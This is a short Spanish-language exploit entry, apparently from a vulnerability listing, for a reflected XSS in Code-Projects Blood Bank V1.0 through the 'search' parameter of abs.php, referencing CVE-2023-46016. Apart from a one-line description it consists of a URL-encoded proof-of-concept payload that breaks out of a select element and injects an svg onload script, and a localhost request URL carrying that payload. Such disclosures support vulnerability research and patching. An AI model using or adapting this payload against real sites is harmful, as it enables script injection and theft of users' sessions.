
Exploit de XSS reflejado para Code-Projects Blood Bank V1.0 a través del parámetro 'search' en abs.php, con payload PoC y documentación de CVE-2023-46016.
%22%3E%3C/option%3E%20%3C/select%3E%3Cbr%3E%3Csvg/onload=alert(document.domain)%3Ehttp://localhost/bloodbank/abs.php?search=%22%3E%3C/option%3E%20%3C/select%3E%3Cbr%3E%3Csvg/onload=alert(document.domain)%3E